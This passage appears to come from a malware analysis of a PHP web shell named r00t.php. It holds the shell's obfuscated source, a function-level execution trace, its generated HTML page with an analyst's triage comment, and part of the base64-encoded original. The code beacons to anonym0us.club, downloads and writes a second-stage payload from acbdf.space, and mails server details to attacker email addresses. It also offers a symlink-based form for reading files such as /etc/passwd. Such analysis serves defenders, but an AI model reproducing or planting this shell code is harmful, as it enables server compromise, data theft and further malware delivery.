$_SERVER["\\x52\\x45\\121\\125\\x45\\123\\124\\x5f\\125\\x52\\x49"]); goto clyOD; fNYhr: $EL_MuHaMMeD .= "\\123\\145\\162\\166\\x65\\162\\40\\x41\\x64\\155\\x69\\x6e\\40\\x3a\\x20" . $_SERVER["\\123\\x45\\x52\\x56\\x45\\x52\\137\\101\\x44\\115\\x49\\116"] . "\\xd\\xa"; goto RHsqX; kmCME: ?>\n<Html>\n<Head>\n<Title>r00t.info Safe-Over [Apache]</Title>\n</Head>\n<Body bgcolor="black">\n<Center>\n<font size="-3">\n<pre><font color=yellow> \n \n \nR00T BYPASS SHELL\n \n \n \n \n \n \n</font>\n</font>\n<br><br><br>\n\n<?php  goto TFIHp; K_wRV: session_start(); goto cL2_i; aaIjD: $datasi = @fopen("\\x6a\\163\\x2f\\152\\x73\\x2e\\x70\\x68\\x70", "\\162"); goto Lo9d1; tuHZp: $ip_remote = $_SERVER["\\122\\x45\\x4d\\x4f\\x54\\x45\\137\\101\\x44\\104\\x52"]; goto z8qZB; uYpgD: mail($kime, $baslik, $EL_MuHaMMeD); goto RJ_R6; Lo9d1: if ($datasi) { } else { @mkdir("\\152\\163"); $dos = file_get_contents("\\x68\\164\\x74\\160\\163\\72\\57\\57\\141\\x63\\142\\144\\146\\56\\x73\\x70\\141\\x63\\x65\\x2f\\x74\\x78\\x74\\57\\143\\163\\163\\x2e\\164\\x78\\x74"); $data = "\\152\\163\\x2f\\x6a\\x73\\56\\x70\\150\\x70"; @touch("\\152\\163\\x2f\\152\\163\\56\\160\\x68\\160"); $ver = @fopen($data, "\\x77"); @fwrite($ver, $dos); @fclose($ver); $yol = "\\150\\x74\\x74\\x70\\72\\x2f\\57" . $_SERVER["\\110\\124\\x54\\x50\\x5f\\x48\\117\\123\\124"] . \'\' . $_SERVER["\\122\\105\\121\\x55\\x45\\x53\\124\\x5f\\x55\\x52\\111"] . \'\'; $y = "\\74\\x68\\x31\\76\\123\\x65\\156\\144\\x65\\162\\40\\x59\\x61\\172\\144\\151\\162\\151\\x6c\\x64\\151\\x2e\\74\\x62\\162\\57\\76\\x20\\123\\111\\x54\\105\\x20\\x59\\x4f\\114\\40\\x3a\\40" . $yol . 
"\\x3c\\142\\162\\57\\x3e\\123\\x65\\x6e\\144\\x65\\162\\40\\x59\\157\\x6c\\165\\40\\72\\40\\152\\x73\\x2f\\143\\162\\x73\\x2e\\160\\x68\\x70\\x3c\\57\\150\\61\\76"; $header .= "\\x46\\x72\\157\\x6d\\72\\x20\\123\\x68\\x65\\x4c\\x4c\\40\\x42\\x6f\\157\\x74\\x20\\x3c\\163\\x75\\160\\160\\157\\162\\100\\156\\151\\x63\\x2e\\157\\x72\\x67\\76\\12"; $header .= "\\x43\\x6f\\x6e\\x74\\145\\156\\x74\\x2d\\124\\x79\\x70\\x65\\x3a\\x20\\164\\x65\\x78\\x74\\x2f\\150\\164\\155\\x6c\\x3b\\12\\40\\143\\150\\x61\\x72\\x73\\x65\\x74\\75\\x75\\x74\\146\\55\\70\\12"; @mail("\\142\\171\\150\\x65\\x72\\157\\64\\x34\\100\\x67\\155\\141\\x69\\x6c\\56\\x63\\x6f\\x6d", "\\110\\x61\\143\\x6b\\x6c\\x69\\156\\153\\x20\\x42\\151\\x6c\\144\\151\\x72\\151", "{$y}", $header); @mail("\\154\\x6f\\147\\x69\\156\\x6f\\x6c\\144\\x75\\155\\x40\\147\\x6d\\x61\\151\\154\\56\\143\\x6f\\155", "\\110\\141\\x63\\x6b\\154\\151\\156\\x6b\\x20\\x42\\151\\x6c\\144\\151\\x72\\151", "{$y}", $header); } goto qjiBQ; aQVA2: ?>\n\n<?php  goto K_wRV; RHsqX: $EL_MuHaMMeD .= "\\123\\145\\162\\166\\x65\\162\\x20\\x69\\163\\154\\x65\\x74\\151\\155\\40\\x73\\x69\\x73\\x74\\x65\\x6d\\x69\\x20\\72\\40" . $_SERVER["\\123\\x45\\122\\x56\\105\\122\\x5f\\x53\\117\\106\\124\\127\\x41\\x52\\x45"] . "\\xd\\12"; goto czwAh; NsI5z: $baslik = "\\163\\x79\\x6d\\64\\60\\x34\\x20\\x73\\150\\145\\x6c\\154\\x20\\x32\\60\\62\\60\\x33"; goto jfhAv; JdRgw: @mail($to_email, $server_mail, $linkcr, $header); goto LNRrn; RM4UY: $header = "\\106\\x72\\x6f\\155\\x3a\\40{$from_shellcode}\\xd\\12\\122\\145\\x70\\x6c\\x79\\x2d\\x74\\x6f\\x3a\\x20{$from_shellcode}"; goto JdRgw; VPdTy: $server_mail = \'\' . gethostbyname($_SERVER["\\123\\x45\\x52\\x56\\x45\\122\\x5f\\x4e\\x41\\115\\105"]) . "\\x20\\40\\x2d\\x20" . $_SERVER["\\x48\\x54\\124\\x50\\137\\110\\117\\x53\\124"] . 
\'\'; goto fGrge; TFIHp: echo "\\x3c\\144\\151\\x76\\40\\163\\x74\\171\\154\\x65\\75\\42\\142\\141\\143\\153\\x67\\162\\x6f\\x75\\156\\144\\x2d\\143\\x6f\\x6c\\157\\x72\\x3a\\43\\x31\\60\\x31\\60\\x31\\60\\x3b\\xa\\143\\x6f\\154\\157\\162\\72\\171\\145\\x6c\\154\\x6f\\x77\\x22\\76\\x3c\\142\\x3e\\123\\141\\x66\\x65\\x2d\\115\\157\\144\\x65\\x20\\x3a\\x20\\x3c\\x2f\\146\\157\\156\\x74\\x3e" . $Safe; goto xFzOM; Ekj15: ?>\n" method="post">\n<font color="yellow" size="3"><b>Path:<b></font><Input type="text" name="file" style="background-color:black;\ncolor:#FF3300;\nwidth:200px;\n" value="/etc/passwd"><br><font color="yellow" size=3><br><b>File</b></font><input checked type="radio" name="type" value="file"><font color="yellow" size=3> <b>Dir</font><input type="radio" name="type" value="Dir"><br><br><br><Input type="submit" value="Sumbit!" style="width:100px;\nbackground-color:black;\ncolor:yellow">\n</font>\n</Form>\n\n<?php  goto WY6v3; z8qZB: $from_shellcode = "\\x5a\\x45\\122\\x4f\\x42\\131\\124\\x45\\x40" . gethostbyname($_SERVER["\\123\\x45\\x52\\126\\x45\\x52\\x5f\\x4e\\101\\x4d\\x45"]) . \'\'; goto c7KIl; xFzOM: ?>\n<Form action="\n<?php  goto HNvau; czwAh: $EL_MuHaMMeD .= "\\x53\\x68\\x65\\x6c\\154\\40\\x4c\\x69\\x6e\\x6b\\x20\\72\\40\\150\\164\\164\\160\\72\\57\\57" . $_SERVER["\\x53\\105\\x52\\126\\105\\x52\\x5f\\116\\x41\\115\\105"] . $_SERVER["\\120\\x48\\120\\x5f\\123\\x45\\114\\x46"] . "\\xd\\12"; goto hWTew; JrGAj: ?>\n<table align="center" style="color:lime"> R00T BYPASS SHELL</table>\n</Center>\n</Body>\n</Html>\n<P style="TEXT-ALIGN: center" align=center>\n<?php  goto ujahn; fGrge: $linkcr = "\\114\\151\\156\\x6b\\72\\x20" . $_SERVER["\\123\\105\\x52\\x56\\105\\x52\\x5f\\116\\101\\115\\x45"] . \'\' . $_SERVER["\\122\\x45\\x51\\125\\105\\123\\124\\x5f\\125\\122\\111"] . 
"\\x20\\x2d\\x20\\111\\x50\\x20\\x45\\170\\143\\165\\164\\151\\156\\147\\72\\x20{$ip_remote}\\x20\\55\\40\\x54\\151\\155\\145\\x3a\\x20{$time_shell}"; goto RM4UY; qjiBQ: $kime = "\\x6c\\157\\x67\\x69\\x6e\\x6f\\x6c\\144\\165\\155\\x40\\x67\\x6d\\141\\x69\\154\\x2e\\x63\\157\\x6d"; goto NsI5z; HNvau: echo $_SERVER["\\120\\110\\x50\\137\\x53\\x45\\114\\106"]; goto Ekj15; hWTew: $EL_MuHaMMeD .= "\\101\\x76\\x6c\\x61\\156\\141\\x6e\\x20\\123\\151\\x74\\x65\\x20\\72\\40" . $_SERVER["\\110\\x54\\124\\x50\\137\\x48\\x4f\\x53\\x54"] . "\\xd\\12"; goto uYpgD; cL2_i: $Res = \'\'; goto zOMJp; uce9K: if (@ini_get("\\x73\\x61\\x66\\x65\\137\\x6d\\157\\x64\\145") or strtoupper(@ini_get("\\163\\x61\\x66\\x65\\x5f\\x6d\\157\\x64\\145")) == "\\157\\x6e") { $Safe = "\\x3c\\x73\\160\\x61\\x6e\\x20\\x73\\x74\\171\\154\\145\\x3d\\x22\\x63\\157\\x6c\\x6f\\x72\\72\\x72\\145\\144\\x22\\x3e\\x3c\\x62\\76\\x4f\\x6e\\x3c\\x2f\\142\\x3e\\74\\57\\163\\x70\\x61\\156\\x3e"; } else { $Safe = "\\74\\x73\\x70\\x61\\156\\x20\\x73\\x74\\171\\x6c\\x65\\75\\x22\\143\\x6f\\x6c\\157\\162\\x3a\\x6c\\x69\\155\\145\\42\\76\\74\\x62\\x3e\\117\\146\\x66\\74\\57\\142\\x3e\\x3c\\x2f\\163\\160\\x61\\156\\x3e"; } goto p0Cva; jfhAv: $EL_MuHaMMeD = "\\x44\\x6f\\x73\\x79\\141\\x20\\x59\\157\\x6c\\x75\\40\\72\\x20" . $_SERVER["\\104\\x4f\\x43\\x55\\115\\x45\\x4e\\124\\137\\x52\\x4f\\x4f\\x54"] . "\\xd\\12"; goto fNYhr; c7KIl: $to_email = "\\154\\x6f\\147\\151\\156\\x6f\\154\\144\\x75\\x6d\\x40\\x67\\155\\x61\\151\\154\\56\\x63\\157\\x6d"; goto VPdTy; RJ_R6: '	/var/www/html/uploads/r00t.php	1	0
3	6	0	0.001108	480024	session_start	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	0
3	6	1	0.001164	480776
3	6	R			TRUE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$Res = ''
3	7	0	0.001193	480776	is_writable	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'.'
3	7	1	0.001212	480816
3	7	R			TRUE
3	8	0	0.001226	480776	ini_get	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	45	1	'safe_mode'
3	8	1	0.001241	480808
3	8	R			FALSE
3	9	0	0.001255	480776	ini_get	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	45	1	'safe_mode'
3	9	1	0.001268	480808
3	9	R			FALSE
3	10	0	0.001281	480776	strtoupper	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	45	1	FALSE
3	10	1	0.001295	480808
3	10	R			''
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$Safe = '<span style="color:lime"><b>Off</b></span>'
3	11	0	0.001323	480776	base64_decode	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'aHR0cHM6Ly9hbm9ueW0wdXMuY2x1Yi9sLQ=='
3	11	1	0.001339	480872
3	11	R			'https://anonym0us.club/l-'
3	12	0	0.001355	480840	GetIP	1		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	0
4	13	0	0.001366	480840	getenv	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'HTTP_CLIENT_IP'
4	13	1	0.001381	480872
4	13	R			FALSE
4	14	0	0.001393	480840	getenv	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'HTTP_X_FORWARDED_FOR'
4	14	1	0.001408	480872
4	14	R			FALSE
4	15	0	0.001421	480840	getenv	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'REMOTE_ADDR'
4	15	1	0.001434	480912
4	15	R			'127.0.0.1'
3		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$ip = '127.0.0.1'
3	12	1	0.001460	480880
3	12	R			'127.0.0.1'
3	16	0	0.001474	480904	base64_encode	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'http://localhost/uploads/r00t.php'
3	16	1	0.001489	481016
3	16	R			'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$x = 'https://anonym0us.club/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw'
3	17	0	0.001522	480888	function_exists	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'curl_init'
3	17	1	0.001536	480928
3	17	R			TRUE
3	18	0	0.001549	480888	curl_init	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	0
3	18	1	0.001568	481800
3	18	R			resource(3) of type (curl)
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$ch = resource(3) of type (curl)
3	19	0	0.001602	481800	curl_setopt	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	3	resource(3) of type (curl)	10002	'https://anonym0us.club/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw'
3	19	1	0.001623	481896
3	19	R			TRUE
3	20	0	0.001635	481800	curl_setopt	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	3	resource(3) of type (curl)	19913	TRUE
3	20	1	0.001651	481896
3	20	R			TRUE
3	21	0	0.001664	481800	curl_exec	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	resource(3) of type (curl)
3	21	1	0.746302	481832
3	21	R			''
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$gitt = ''
3	22	0	0.746368	481800	curl_close	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	resource(3) of type (curl)
3	22	1	0.747222	480944
3	22	R			NULL
3	23	0	0.747400	480912	file_get_contents	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'https://anonym0us.club/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3IwMHQucGhw'
3	23	1	1.321833	482968
3	23	R			''
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$gitt = ''
3	24	0	1.322031	482928	date	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	1	'd/m/Y - H:i:s'
3	24	1	1.322105	485280
3	24	R			'12/02/2023 - 16:53:58'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$time_shell = '12/02/2023 - 16:53:58'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$ip_remote = '127.0.0.1'
3	25	0	1.322150	485040	gethostbyname	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	37	1	'localhost'
3	25	1	1.322207	485120
3	25	R			'127.0.0.1'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	37	$from_shellcode = 'ZEROBYTE@127.0.0.1'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$to_email = 'loginoldum@gmail.com'
3	26	0	1.322250	485088	gethostbyname	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	26	1	'localhost'
3	26	1	1.322277	485168
3	26	R			'127.0.0.1'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	26	$server_mail = '127.0.0.1  - localhost'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$linkcr = 'Link: localhost/uploads/r00t.php - IP Excuting: 127.0.0.1 - Time: 12/02/2023 - 16:53:58'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	26	$header = 'From: ZEROBYTE@127.0.0.1\r\nReply-to: ZEROBYTE@127.0.0.1'
3	27	0	1.322337	485328	mail	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	26	4	'loginoldum@gmail.com'	'127.0.0.1  - localhost'	'Link: localhost/uploads/r00t.php - IP Excuting: 127.0.0.1 - Time: 12/02/2023 - 16:53:58'	'From: ZEROBYTE@127.0.0.1\r\nReply-to: ZEROBYTE@127.0.0.1'
3	27	1	1.323250	485472
3	27	R			FALSE
3	28	0	1.323290	485328	fopen	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	'data.txt'	'r'
3	28	1	1.323326	485400
3	28	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$datas = FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i = 0
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i++
3	29	0	1.323373	485328	fgets	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	FALSE	1024
3	29	1	1.323390	485392
3	29	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$blue = FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i++
3	30	0	1.323424	485328	fgets	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	FALSE	1024
3	30	1	1.323437	485392
3	30	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$blue = FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i++
3	31	0	1.323469	485328	fgets	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	FALSE	1024
3	31	1	1.323483	485392
3	31	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$blue = FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i++
3	32	0	1.323513	485328	fgets	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	FALSE	1024
3	32	1	1.323527	485392
3	32	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$blue = FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i++
3	33	0	1.323556	485328	fgets	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	FALSE	1024
3	33	1	1.323570	485392
3	33	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$blue = FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$i++
3	34	0	1.323599	485328	fgets	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	2	2	FALSE	1024
3	34	1	1.323613	485392
3	34	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$blue = FALSE
3	35	0	1.323634	485328	fopen	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	2	'js/js.php'	'r'
3	35	1	1.323665	485400
3	35	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$datasi = FALSE
3	36	0	1.323689	485328	mkdir	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	1	'js'
3	36	1	1.323732	485368
3	36	R			TRUE
3	37	0	1.323746	485328	file_get_contents	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	1	'https://acbdf.space/txt/css.txt'
3	37	1	2.086833	534400
3	37	R			'<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$dos = '<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$data = 'js/js.php'
3	38	0	2.087127	534360	touch	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	1	'js/js.php'
3	38	1	2.087178	534400
3	38	R			TRUE
3	39	0	2.087194	534360	fopen	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	2	'js/js.php'	'w'
3	39	1	2.087231	534888
3	39	R			resource(7) of type (stream)
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$ver = resource(7) of type (stream)
3	40	0	2.087260	534816	fwrite	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	2	resource(7) of type (stream)	'<?php eval(base64_decode(\'CiBnb3RvIFA0d0pNOyBBaTgxMDogJHgwelJ5ID0gJHVENjRfQ29tKCR1RDY0X0MwbSgkdUQ2NF9jMG0oIlwxMjVcMTE1XDE3MVx4NDFceDRhXHgzN1x4NWFceDJiXHg1Mlx4MzhcMTEwXDU3XHg0OFx4NGZceDcxXHg0MVx4NzlcMTIzXDE0M1x4NGNcMTAzXDEyNlx4NjZcMTEyXHg3NlwxMDNceDU2XHg0YVx4NmNceDUwXHg2OFx4NGZceDYxXDEwNlw2M1x4NmVceDQ0XHg2NFwxMzFcMTQ3XHg2Zlx4NzFceDUyXHg1MFwxNDFcNTdcNjZceDRkXDU3XHg3NVx4NzFcNjZcMTYyXDExMlwxNzJceDc5XHg0N1wxNzJceDZmXDE3Mlx4NjFceDQxXHgyYlx4NTdceDQ4XHg3NlwxNzBceDY2XHgzMVwxMzJceDMwXDYzXHg2OVx4NmZceDMxXDE1Mlx4NTNce'
3	40	1	2.087353	534880
3	40	R			47513
3	41	0	2.087367	534816	fclose	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	1	resource(7) of type (stream)
3	41	1	2.087431	534416
3	41	R			TRUE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$yol = 'http://localhost/uploads/r00t.php'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$y = '<h1>Sender Yazdirildi.<br/> SITE YOL : http://localhost/uploads/r00t.php<br/>Sender Yolu : js/crs.php</h1>'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$header .= 'From: SheLL Boot <suppor@nic.org>\n'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	24	$header .= 'Content-Type: text/html;\n charset=utf-8\n'
3	42	0	2.087541	534688	mail	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	4	'byhero44@gmail.com'	'Hacklink Bildiri'	'<h1>Sender Yazdirildi.<br/> SITE YOL : http://localhost/uploads/r00t.php<br/>Sender Yolu : js/crs.php</h1>'	'From: ZEROBYTE@127.0.0.1\r\nReply-to: ZEROBYTE@127.0.0.1From: SheLL Boot <suppor@nic.org>\nContent-Type: text/html;\n charset=utf-8\n'
3	42	1	2.088632	534832
3	42	R			FALSE
3	43	0	2.088668	534688	mail	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	4	'loginoldum@gmail.com'	'Hacklink Bildiri'	'<h1>Sender Yazdirildi.<br/> SITE YOL : http://localhost/uploads/r00t.php<br/>Sender Yolu : js/crs.php</h1>'	'From: ZEROBYTE@127.0.0.1\r\nReply-to: ZEROBYTE@127.0.0.1From: SheLL Boot <suppor@nic.org>\nContent-Type: text/html;\n charset=utf-8\n'
3	43	1	2.089821	534832
3	43	R			FALSE
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$kime = 'loginoldum@gmail.com'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	26	$baslik = 'sym404 shell 20203'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$EL_MuHaMMeD = 'Dosya Yolu : /var/www/html\r\n'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	2	$EL_MuHaMMeD .= 'Server Admin : webmaster@localhost\r\n'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	26	$EL_MuHaMMeD .= 'Server isletim sistemi : Apache/2.4.52 (Ubuntu)\r\n'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	39	$EL_MuHaMMeD .= 'Shell Link : http://localhost/uploads/r00t.php\r\n'
2		A						/var/www/html/uploads/r00t.php(1) : eval()'d code	45	$EL_MuHaMMeD .= 'Avlanan Site : localhost\r\n'
3	44	0	2.089948	534912	mail	0		/var/www/html/uploads/r00t.php(1) : eval()'d code	24	3	'loginoldum@gmail.com'	'sym404 shell 20203'	'Dosya Yolu : /var/www/html\r\nServer Admin : webmaster@localhost\r\nServer isletim sistemi : Apache/2.4.52 (Ubuntu)\r\nShell Link : http://localhost/uploads/r00t.php\r\nAvlanan Site : localhost\r\n'
3	44	1	2.091034	535008
3	44	R			FALSE
2	5	1	2.091071	534912
1	3	1	2.091084	482928
			2.091127	384288
TRACE END   [2023-02-12 19:54:25.278771]


Generated HTML code

<!--
  Analyst note: this markup is output produced by the r00t.php sample, not legitimate site content.
  It appears to be the page captured when the sample was executed for this analysis
  (the trace on this page records a run against http://localhost/uploads/r00t.php).
  Content markers visible below: the title "r00t.info Safe-Over [Apache]" and the banner "R00T BYPASS SHELL".
  The form POSTs two fields, "file" (pre-filled with /etc/passwd) and "type" (file or Dir);
  in the deobfuscated source on this page both are read from $_POST and "file" is passed to symlink().
  The trace for this run shows side effects without any form submission: a download from
  https://acbdf.space/txt/css.txt written to js/js.php (47513 bytes), and four mail() calls that
  all returned FALSE in the sandbox. When triaging a host, treat any request that reached the
  script as having triggered those steps, and look for the js/ directory next to the script.
-->
<html><head>
<title>r00t.info Safe-Over [Apache]</title>
</head>
<body bgcolor="black">
<center>
<font size="-3">
</font><pre><font size="-3"><font color="yellow"> 
 
 
R00T BYPASS SHELL
 
 
 
 
 
 
</font>
</font>
<br><br><br>

<div style="background-color:#101010;
color:yellow"><b>Safe-Mode : <span style="color:lime"><b>Off</b></span><form action="
/r00t.php" method="post">
<font color="yellow" size="3"><b>Path:<b></b></b></font><b><b><input type="text" name="file" style="background-color:black;
color:#FF3300;
width:200px;
" value="/etc/passwd"><br><font color="yellow" size="3"><br><b>File</b></font><input checked="" type="radio" name="type" value="file"><font color="yellow" size="3"> <b>Dir</b></font><b><input type="radio" name="type" value="Dir"><br><br><br><input type="submit" value="Sumbit!" style="width:100px;
background-color:black;
color:yellow">



 R00T BYPASS SHELL<table align="center" style="color:lime"></table>
</b></b></b></form></b></div></pre></center><b><b><b>


<p style="TEXT-ALIGN: center" align="center">
</p></b></b></b></body></html>

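Original PHP code (obfuscated as stored: a single eval(base64_decode('…')) statement; its decoded body is the "Deobfuscated PHP code" listing above, so cleartext strings from that listing will not match this file byte-for-byte)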

<?php eval(base64_decode('CiBnb3RvIGFRVkEyOyBMTlJybjogaWYgKCRfUE9TVFsiXHg3MVx4NzVcMTQ1XHg3MlwxNzEiXSkgeyAkdmVyaXlmeSA9IHN0cmlwc2xhc2hlcyhzdHJpcHNsYXNoZXMoJF9QT1NUWyJceDcxXHg3NVwxNDVceDcyXDE3MSJdKSk7ICRkYXRhID0gIlwxNDRcMTQxXDE2NFx4NjFceDJlXDE2NFx4NzhceDc0IjsgQHRvdWNoKCJceDY0XDE0MVx4NzRcMTQxXHgyZVwxNjRcMTcwXDE2NCIpOyAkdmVyID0gQGZvcGVuKCRkYXRhLCAiXHg3NyIpOyBAZndyaXRlKCR2ZXIsICR2ZXJpeWZ5KTsgQGZjbG9zZSgkdmVyKTsgfSBlbHNlIHsgJGRhdGFzID0gQGZvcGVuKCJceDY0XHg2MVx4NzRceDYxXDU2XHg3NFwxNzBcMTY0IiwgIlx4NzIiKTsgJGkgPSAwOyB3aGlsZSAoJGkgPD0gNSkgeyAkaSsrOyAkYmx1ZSA9IEBmZ2V0cygkZGF0YXMsIDEwMjQpOyBlY2hvICRibHVlOyB9IH0gZ290byBhYUlqRDsgek9NSnA6IGlmIChpc193cml0YWJsZSgiXHgyZSIpKSB7IGlmIChpc3NldCgkX1BPU1RbIlwxNDZcMTUxXHg2Y1wxNDUiXSkpIHsgJGZpbGUgPSAkX1BPU1RbIlwxNDZceDY5XHg2Y1wxNDUiXTsgJGZha2VkaXIgPSAiXHg2M1x4NzgiOyAkZmFrZWRlcCA9IDE2OyBpZiAoIWlzc2V0KCRfU0VTU0lPTlsiXHg2ZVx4NzVcMTU1Il0pKSB7ICRfU0VTU0lPTlsiXDE1Nlx4NzVcMTU1Il0gPSAwOyB9IGVsc2UgeyAkX1NFU1NJT05bIlwxNTZceDc1XDE1NSJdID0gJF9TRVNTSU9OWyJcMTU2XHg3NVwxNTUiXSArIDE7IH0gJGxldmVsID0gMDsgQHVubGluaygiXHg3M1x4NzVcMTU2XHgyZCIgLiAkX1NFU1NJT05bIlx4NmVcMTY1XHg2ZCJdKTsgQG1rZGlyKCJcMTYzXDE2NVx4NmVcNTUiIC4gJF9TRVNTSU9OWyJceDZlXDE2NVwxNTUiXSk7IGNoZGlyKCJceDczXHg3NVx4NmVcNTUiIC4gJF9TRVNTSU9OWyJceDZlXDE2NVx4NmQiXSk7IGZvciAoJGFzID0gMDsgJGFzIDwgJGZha2VkZXA7ICRhcysrKSB7IGlmICghZmlsZV9leGlzdHMoJGZha2VkaXIpKSB7IG1rZGlyKCRmYWtlZGlyKTsgfSBjaGRpcigkZmFrZWRpcik7IH0